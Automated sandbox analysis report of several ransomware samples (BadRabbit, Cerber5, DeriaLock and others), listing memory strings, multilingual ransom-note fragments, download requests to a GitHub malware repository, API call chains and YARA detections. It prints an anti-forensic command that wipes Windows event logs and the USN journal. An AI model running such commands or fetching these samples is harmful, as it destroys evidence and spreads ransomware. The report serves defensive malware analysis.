Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F
Source: svchost.exe, 00000036.00000003.388999124.000002826005F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: Endermanch@BadRabbit.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: Endermanch@BadRabbit.exe, 00000020.00000002.329764333.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Endermanch@BadRabbit.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa06
Source: svchost.exe, 00000036.00000003.389098362.000002826005C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000036.00000003.388999124.000002826005F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000036.00000002.409515598.000002826003D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000036.00000003.388999124.000002826005F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000036.00000003.390242808.0000028260047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.409689465.000002826004D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000036.00000003.337577372.0000028260031000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000036.00000003.388999124.000002826005F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000036.00000002.409515598.000002826003D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000036.00000003.388999124.000002826005F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000036.00000003.388999124.000002826005F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000036.00000003.388999124.000002826005F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000036.00000003.337577372.0000028260031000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000036.00000002.409546838.0000028260042000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000003.391639862.0000028260041000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000036.00000002.409546838.0000028260042000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000003.391639862.0000028260041000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000036.00000003.388999124.000002826005F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000036.00000002.409515598.000002826003D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.409721028.0000028260058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000003.389291189.0000028260057000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000036.00000003.389098362.000002826005C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000036.00000002.409721028.0000028260058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000003.389291189.0000028260057000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000036.00000002.409721028.0000028260058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000003.389291189.0000028260057000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000036.00000002.409689465.000002826004D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000036.00000003.388999124.000002826005F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000036.00000002.409515598.000002826003D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000036.00000003.337577372.0000028260031000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000036.00000002.409515598.000002826003D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000036.00000002.409515598.000002826003D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.404447518.0000028260013000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000036.00000003.391384207.0000028260045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000036.00000003.391384207.0000028260045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000036.00000003.337577372.0000028260031000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000036.00000003.337577372.0000028260031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.409502792.000002826003A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000036.00000003.390242808.0000028260047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.409689465.000002826004D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: Endermanch@Cerber5.exe, 00000013.00000002.517214443.00000000063F6000.00000004.00000800.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com
Source: Endermanch@Cerber5.exe, 00000013.00000002.517214443.00000000063F6000.00000004.00000800.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com/s?wd=%E6%80%8E%E4%B9%88%E5%AE%89%E8%A3%85%20tor%20%E6%B5%8F%E8%A7%88%E5%99%A8
Source: Endermanch@Cerber5.exe, 00000013.00000003.353550421.00000000063DA000.00000004.00000800.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 00000013.00000002.472553764.00000000063C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.torproject.org/
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.torproject.org/download/download-easy.html.en
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.torproject.org/download/download-easy.html.en
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/results?search_query=Install

Source: unknown

DNS traffic detected: queries for: github.com

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_007B2054 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,htons,send,recv,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

3_2_007B2054

Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1Host: github.com
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1Host: raw.githubusercontent.com
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Cerber%205.zip HTTP/1.1Host: github.com
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip HTTP/1.1Host: raw.githubusercontent.com
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/DeriaLock.zip HTTP/1.1Host: github.com
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip HTTP/1.1Host: raw.githubusercontent.com
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Fantom.zip HTTP/1.1Host: github.com
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip HTTP/1.1Host: raw.githubusercontent.com
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zip HTTP/1.1Host: github.com
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip HTTP/1.1Host: raw.githubusercontent.com
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Krotten.zip HTTP/1.1Host: github.com
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip HTTP/1.1Host: raw.githubusercontent.com
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/NoMoreRansom.zip HTTP/1.1Host: github.com
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip HTTP/1.1Host: raw.githubusercontent.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	TCP traffic detected without corresponding DNS query: 23.50.106.206
Source: unknown	TCP traffic detected without corresponding DNS query: 23.50.106.206
Source: unknown	TCP traffic detected without corresponding DNS query: 23.50.106.206
Source: unknown	TCP traffic detected without corresponding DNS query: 23.50.106.206
Source: unknown	TCP traffic detected without corresponding DNS query: 23.50.106.206
Source: unknown	TCP traffic detected without corresponding DNS query: 23.50.106.206
Source: unknown	TCP traffic detected without corresponding DNS query: 23.50.106.206
Source: unknown	TCP traffic detected without corresponding DNS query: 23.50.106.206
Source: unknown	TCP traffic detected without corresponding DNS query: 23.50.106.206
Source: unknown	TCP traffic detected without corresponding DNS query: 23.50.106.206
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.0
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.1
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.2
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.3
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.4
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.5
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.6
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.7
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.8
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.9
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.10
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.11
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.12
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.13
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.14
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.15
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.16
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.17
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.18
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.19
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.20
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.21
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.22
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.23
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.24
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.25
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.26
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.27
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.28
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.29
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.30
Source: unknown	UDP traffic detected without corresponding DNS query: 93.107.12.31
Source: unknown	UDP traffic detected without corresponding DNS query: 95.1.200.0
Source: unknown	UDP traffic detected without corresponding DNS query: 95.1.200.1
Source: unknown	UDP traffic detected without corresponding DNS query: 95.1.200.2
Source: unknown	UDP traffic detected without corresponding DNS query: 95.1.200.3
Source: unknown	UDP traffic detected without corresponding DNS query: 95.1.200.4
Source: unknown	UDP traffic detected without corresponding DNS query: 95.1.200.5
Source: unknown	UDP traffic detected without corresponding DNS query: 95.1.200.6
Source: unknown	UDP traffic detected without corresponding DNS query: 95.1.200.7

Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <p>If you have any pr<span class="h">0t</span>oblems during installation or use of Tor Browser, please, visit <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> and type request in the searc<span class="h">x8aFJo5</span>h bar "Install Tor Browser Windows" and you will find a lot of training videos about Tor Browser installation and use.</p> equals www.youtube.com (Youtube)
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <p>If you have any pr<span class="h">{RAND}</span>oblems during installation or use of Tor Browser, please, visit <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> and type request in the searc<span class="h">{RAND}</span>h bar "Install Tor Browser Windows" and you will find a lot of training videos about Tor Browser installation and use.</p> equals www.youtube.com (Youtube)
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <p>Indien uw problemen heeft tijdens de installatie of het gebruik van Tor Browser, ga dan naar <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> en typ in de zoekbalk equals www.youtube.com (Youtube)
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <p>Se si riscontrano problemi durante l'installazione o l'utilizzo di Tor Browser, visitare <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> e immettere "install tor browser windows" nella barra di ricerca per trovare numerosi video esplicativi sull'installazione e utilizzo di Tor Browser.</p> equals www.youtube.com (Youtube)
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> equals www.youtube.com (Youtube)
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: do portalu <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> i wpisz w wyszukiwarce equals www.youtube.com (Youtube)
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> equals www.youtube.com (Youtube)
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: hrend der Installation von Tor Browser Probleme haben, besuchen Sie bitte <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> und geben als Suchanforderung "tor browser Windows installieren" ein und Sie erhalten in den Suchergebnossen viele Anleitungsvideos equals www.youtube.com (Youtube)
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: n, o durante el uso del Navegador Tor, visite <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> y escriba la solicitud en la barra de b equals www.youtube.com (Youtube)
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: o do Tor Browser, visite <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> e insira o pedido na barra de pesquisa equals www.youtube.com (Youtube)
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: rken herhangi bir sorununuz olursa <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> adresine gidin ve arama equals www.youtube.com (Youtube)
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: utilisation de Tor Browser, veuillez visiter <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> et saisir la demande dans la barre de recherche equals www.youtube.com (Youtube)

Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:49719 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe

Code function: 19_2_004089AC GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetDeviceCaps,MulDiv,CreateFontW,SelectObject,SetBkColor,SetTextColor,GetStockObject,FillRect,SetPixel,DrawTextA,DrawTextA,GetObjectW,GetDIBits,CreateFileW,WriteFile,WriteFile,WriteFile,CloseHandle,SystemParametersInfoW,SelectObject,DeleteObject,SelectObject,DeleteObject,DeleteDC,ReleaseDC,

19_2_004089AC

Source: Endermanch@Cerber5.exe, 00000013.00000002.416614254.000000000176A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands

Yara detected DeriaLock Ransomware

Source: Yara match	File source: 44.0.Endermanch@DeriaLock.exe.d80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002C.00000000.315363439.0000000000DC6000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Endermanch@DeriaLock.exe PID: 3576, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe, type: DROPPED

Yara detected Babuk Ransomware

Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2852, type: MEMORYSTR

Yara detected Cerber ransomware

Source: Yara match

File source: Process Memory Space: Endermanch@Cerber5.exe PID: 5148, type: MEMORYSTR

Yara detected InfinityLock Ransomware

Source: Yara match

File source: C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe, type: DROPPED

Clears the journal log

Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:

Clears the windows event log

Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:			Jump to behavior

Contains functionalty to change the wallpaper

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_004089AC GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetDeviceCaps,MulDiv,CreateFontW,SelectObject,SetBkColor,SetTextColor,GetStockObject,FillRect,SetPixel,DrawTextA,DrawTextA,GetObjectW,GetDIBits,CreateFileW,WriteFile,WriteFile,WriteFile,CloseHandle,SystemParametersInfoW,SelectObject,DeleteObject,SelectObject,DeleteObject,DeleteDC,ReleaseDC,		19_2_004089AC
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_004089AC GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetDeviceCaps,MulDiv,CreateFontW,SelectObject,SetBkColor,SetTextColor,GetStockObject,FillRect,SetPixel,DrawTextA,DrawTextA,GetObjectW,GetDIBits,CreateFileW,WriteFile,WriteFile,WriteFile,CloseHandle,SystemParametersInfoW,SelectObject,DeleteObject,SelectObject,DeleteObject,DeleteDC,ReleaseDC,		40_2_004089AC

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B15A7 GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,HeapAlloc,CryptAcquireContextW,GetProcessHeap,HeapAlloc,CryptImportKey,CryptCreateHash,CryptSetHashParam,GetProcessHeap,HeapFree,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	3_2_007B15A7
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_0040AF8D memcpy,CryptImportKey,	19_2_0040AF8D
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_0040B253 CryptImportKey,	19_2_0040B253
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_0040B253 CryptImportKey,	40_2_0040B253
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_0040AF8D memcpy,CryptImportKey,	40_2_0040AF8D

System Summary

Malicious sample detected (through community Yara rule)

Source: 32.2.Endermanch@BadRabbit.exe.1320000.1.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 49.0.Endermanch@BadRabbit.exe.1320000.0.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 40.2.Endermanch@Cerber5.exe.4df0000.2.unpack, type: UNPACKEDPE	Matched rule: Cerber Payload Author: kevoreilly
Source: 40.2.Endermanch@Cerber5.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Cerber Payload Author: kevoreilly
Source: 10.0.Endermanch@BadRabbit.exe.1320000.2.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 4.2.Endermanch@BadRabbit.exe.1320000.0.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 1.0.Endermanch@BadRabbit.exe.1320000.3.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 27.0.5753.tmp.7ff7cef20000.2.unpack, type: UNPACKEDPE	Matched rule: Auto-generated rule Author: Florian Roth
Source: 58.2.Endermanch@Cerber5.exe.4e10000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Cerber Payload Author: kevoreilly
Source: 4.0.Endermanch@BadRabbit.exe.1320000.3.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 40.2.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Cerber Payload Author: kevoreilly
Source: 32.0.Endermanch@BadRabbit.exe.1320000.3.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 58.0.Endermanch@Cerber5.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Cerber3 Author: pekeinfo
Source: 10.0.Endermanch@BadRabbit.exe.1320000.1.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
Source: 4.2.Endermanch@BadRabbit.exe.1426458.1.unpack, type: UNPACKEDPE	Matched rule: Detects BadRabbit Ransomware Author: Florian Roth
